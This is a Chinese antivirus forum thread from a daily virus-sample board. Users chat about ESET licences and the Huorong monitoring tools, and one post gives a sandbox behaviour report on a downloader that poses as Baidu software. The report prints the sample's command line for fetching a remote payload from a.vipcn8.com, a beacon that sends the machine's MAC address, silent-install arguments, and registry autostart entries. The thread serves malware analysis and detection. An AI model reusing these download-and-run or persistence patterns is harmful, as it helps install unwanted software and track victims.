每日样本（12.22)

显示全部楼层 · 发表于 2014-12-23 10:55:51

swq0503 发表于 2014-12-22 12:58

你用的企业版？

显示全部楼层 · 发表于 2014-12-23 10:57:18

仙剑问情发表于 2014-12-23 10:55
你用的企业版？

嗯最新企业版（英文版）

显示全部楼层 · 发表于 2014-12-23 11:01:41

swq0503 发表于 2014-12-23 10:57
嗯最新企业版（英文版）

我以前存了几个ess的一年正版序列号，上次eset有人需要，就送人了，我在找找看吧，找到了送你个ess的。

显示全部楼层 · 发表于 2014-12-23 11:07:11

仙剑问情发表于 2014-12-23 11:01
我以前存了几个ess的一年正版序列号，上次eset有人需要，就送人了，我在找找看吧，找到了送你个ess的。

非常感谢^_^我现在的2015/11/27到期，如果日期差不多就送给需要的人吧
ESS的授权可以用在最新企业版的，我的就是企业版用ESS授权更新

显示全部楼层 · 发表于 2014-12-23 14:41:29

幽冥の龙发表于 2014-12-22 16:15
改后缀后显示百度杀毒的图标
然后有个进程开始后台下载
然后百度杀毒开始静默安装

你下面第二张图用的是什么软件的

显示全部楼层 · 发表于 2014-12-23 14:48:37

dongwenqi 发表于 2014-12-23 14:41
你下面第二张图用的是什么软件的

火绒网络管理和火绒剑

显示全部楼层 · 发表于 2014-12-23 15:23:21

文件名称：64.dat
MD5：30992d61e175af0d4bb2ac393edb027d
Sha-1：adebe2f09e1c4b205e77d09341d264a969246d99
文件大小：685KB
创建时间：2014-12-23 15:04:25
文件类型：EXE
PEID信息：Nothing found [Overlay] *
文件版本：5.0.1.9923
产品版本：5.0
火眼点评
检测指定文件是否开启WINDOWS文件保护;疑似捆绑多个文件，警惕流氓软件捆绑推广或病毒捆绑传播（需与正常安装包区分开）;在系统敏感位置（如开始菜单等)释放链接或快捷方式;下载文件;设置文件属性;IE 代{过}{滤}理服务器设置;创建进程;创建互斥体;搜索指定窗口;查找文件;添加开机自启动项;在其他进程中申请内存;检测是否存在指定注册表键;隐藏指定窗口
新毒霸点评
经新毒霸云安全中心分析，该文件存在病毒，请及时删除！
其他行为监控
行为描述：下载文件
附加信息："http://a.vipcn8.com/test/1.txt" >> "%temp%\dlinstlit.txt"192.168.1.2/no/count.asp?mac=[MAC-ADDRESS]&ver=Fuckhttp://192.168.1.2/no/count.asp?mac=[MAC-ADDRESS]&ver=Fuck
行为描述：在系统敏感位置（如开始菜单等)释放链接或快捷方式
附加信息：Start menu >> 程序\baidu\baidu.lnk >> C:\Program Files (x86)\baidu\baidu.exe
行为描述：疑似捆绑多个文件，警惕流氓软件捆绑推广或病毒捆绑传播（需与正常安装包区分开）
附加信息：baidus.exe
行为描述：检测指定文件是否开启WINDOWS文件保护
附加信息：%ProgramFiles%\baidu\baidus.data%ProgramFiles%\baidu\baidus.exe%ProgramFiles%\baidu\unins000.exe
行为描述：隐藏指定窗口
附加信息：#32770 : [sample.exe]
行为描述：检测是否存在指定注册表键
附加信息：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1
行为描述：在其他进程中申请内存
附加信息：%ProgramFiles%\baidu\baidus.exe%ProgramFiles%\baidus.exe%system%\cmd.exe%temp%\is-APJAP.tmp\baidus.tmp
行为描述：添加开机自启动项
附加信息：[baidu] - %ProgramFiles%\baidu\baidus.exe
行为描述：查找文件
附加信息："*.lnk""%APPDATA%\Microsoft\Internet Explorer\Quick Launch\*.lnk""%AllUsersProfile%\桌面\*.lnk""%ProgramFiles%\baidu\unins???.*""%temp%\is-APJAP.tmp\baidus.tmp""%temp%\is-G6TD4.tmp\*""%temp%\is-G6TD4.tmp\_isetup\*"
行为描述：搜索指定窗口
附加信息：["#32770 (["#32770 (对话框)" , "KaKa Player"]["BDMSusFrame" , "SusWnd"]["BDMTips" , "BDMTrayTipWnd"]["Indicator" , ""]["Shell_TrayWnd" , ""]["SysPager" , ""]["Syspager" , ""]["TXGuiFoundation" , "["TXGuiFoundation" , "小火箭通用加速"]["TXGuiFoundation" , "电脑管家 - 软件管理"]["TXGuiFoundation" , "电脑管家"]["TXGuiFoundation" , "电脑管家：开机时间"]["ToolbarWindow32" , ""]["TrayNotifyWnd" , ""]
行为描述：创建互斥体
附加信息："_SHuassist.mtx"
行为描述：创建进程
附加信息：%ProgramFiles%\baidu\baidus.exe%ProgramFiles%\baidus.exe%system%\cmd.exe%temp%\is-APJAP.tmp\baidus.tmp
行为描述：IE 代{过}{滤}理服务器设置
附加信息：关闭IE代{过}{滤}理服务
行为描述：设置文件属性
附加信息：%ProgramFiles%\baidu\baidus.data >> HIDE%ProgramFiles%\baidu\baidus.exe >> HIDE
文件操作监控
操作文件MD5 文件大小文件路径
新增 d4c3040c4066d0ec8569ffe8088b3c04 719521 %ProgramFiles%\Baidu\unins000.exe
新增 063f4df6ab8c71750d6a0bd59134475d 116 %temp%\HZ~1D.TMP.BAT
新增 9e004a7e3c30a4e73e77e45e3ffd8248 45 %ProgramFiles%\Baidu\baidus.ini
新增 b155d1a64ad43bdfc95ccaeac0cd6eae 7168 %ProgramFiles%\Baidu\baidus.exe
新增 594d47a145be1ec8fe16c9cd94c3844e 312591 %ProgramFiles%\baidus.exe
新增 be969355598cd75cb2e96b43d1ff3b9b 3514 %ProgramFiles%\Baidu\unins000.dat
新增 8e8eabe2427d7245c8fe67d931bd75b8 479 %AllUsersProfile%\「开始」菜单\程序\baidu\...
新增 6daf9e443cbc584c52f88c1c5890aa79 18432 %ProgramFiles%\Baidu\baidus.data
释放后删除 92dc6ef532fbb4a5c3201469a5b5eb63 23312 %temp%\IS-G6TD4.TMP\_ISETUP\_shfol...
释放后删除 9303156631ee2436db23827e27337be4 708096 %temp%\IS-APJAP.TMP\baidus.tmp
进程操作监控
创建进程：%system%\cmd.exe
启动参数：/c "%temp%\HZ~1D.tmp.bat
创建进程：%ProgramFiles%\baidus.exe
启动参数：/VERYSILENT /SP-
创建进程：%system%\cmd.exe
启动参数："%system%\cmd.exe" /c "%temp%\HZ~1D.tmp.bat"
创建进程：%ProgramFiles%\baidus.exe
启动参数："%ProgramFiles%\baidus.exe" /VERYSILENT /SP-
创建进程：%ProgramFiles%\baidu\baidus.exe
启动参数：-u=http://a.vipcn8.com/test/1.txt -n=windows.exe
创建进程：%ProgramFiles%\baidu\baidus.exe
启动参数："%ProgramFiles%\baidu\baidus.exe" -u=http://a.vipcn8.com/test/1.txt -n=windows.exe
创建进程：无
启动参数："%ProgramFiles%\baidu\baidus.exe"
创建进程：无
启动参数："%temp%\is-APJAP.tmp\baidus.tmp" /SL5="$240138,67416,56832,%ProgramFiles%\baidus.exe" /VERYSILENT /SP-
新增删除修改注册表监控
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Baidu] = [%ProgramFiles%\baidu\baidus.exe]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F...
[MinorVersion] = [0x00000009]
[Inno Setup: Language] = [english]
[DisplayVersion] = [1.9]
[Inno Setup: User] = [Administrator]
[UninstallString] = ["%ProgramFiles%\baidu\unins000.exe"]
[Inno Setup: Deselected Tasks] = []
[InstallDate] = [20130123]
[Inno Setup: Setup Version] = [5.5.5 (a)]
[Inno Setup: Icon Group] = [baidu]
[Inno Setup: Selected Tasks] = [startup,bind1]
[NoModify] = [0x00000001]
[Inno Setup: App Path] = [%ProgramFiles%\baidu]
[QuietUninstallString] = ["%ProgramFiles%\baidu\unins000.exe" /SILENT]
[MajorVersion] = [0x00000001]
[NoRepair] = [0x00000001]
[DisplayName] = [baidu version 1.9]
[InstallLocation] = [%ProgramFiles%\baidu\]
网络监控
网络操作
[HTTP Request]GET a.vipcn8.com/test/1.txt
[HTTP Request]NULL 192.168.1.2/no/count.asp?mac=[MAC-ADDRESS]&ver=Fuck
[Open URL]192.168.1.2
[Open URL]a.vipcn8.com
[Open URL]http://192.168.1.2/no/count.asp?mac=[MAC-ADDRESS]&ver=Fuck

显示全部楼层 · 发表于 2014-12-23 16:26:47

幽冥の龙发表于 2014-12-23 14:48
火绒网络管理和火绒剑

官网没有啊

显示全部楼层 · 发表于 2014-12-23 16:55:04

dongwenqi 发表于 2014-12-23 16:26
官网没有啊

就是火绒

[病毒样本] 每日样本（12.22)

浏览过的版块